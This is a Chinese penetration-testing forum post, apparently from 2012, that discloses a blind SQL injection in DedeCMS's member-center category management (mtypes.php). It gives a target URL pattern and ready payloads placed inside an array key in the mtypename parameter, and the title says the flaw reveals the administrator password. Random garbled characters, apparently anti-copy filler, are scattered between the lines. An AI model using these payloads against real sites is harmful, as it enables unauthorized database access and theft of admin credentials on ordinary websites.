找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密 ...
返回列表 发新帖
查看: 2933|回复: 0
打印 上一主题 下一主题

DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:08:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
4 W  W, A' I9 q0 y$ s4 D' W, O7 P& c6 f% R, \

  I5 d( Y  z6 Q2 D& g发生在数组key里的注射漏洞,有点意思.
! Z. T8 [/ _, i8 O8 l; `1 @ : s: R! ?$ E8 i2 f/ C' q/ ?$ K
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
9 l, a3 B. g- Q+ Q * _8 L/ @# s5 a! v# g
http://www.xxx.com /dede/member/mtypes.php?dopost=save
. M$ P9 J7 a$ z2 g
5 Q' T2 r5 }  c- l* _exploit:
3 s# K  o7 S- amtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r) d$ q# l( f% P5 O/ {4 b8 O
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
' j7 V+ c6 z+ M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表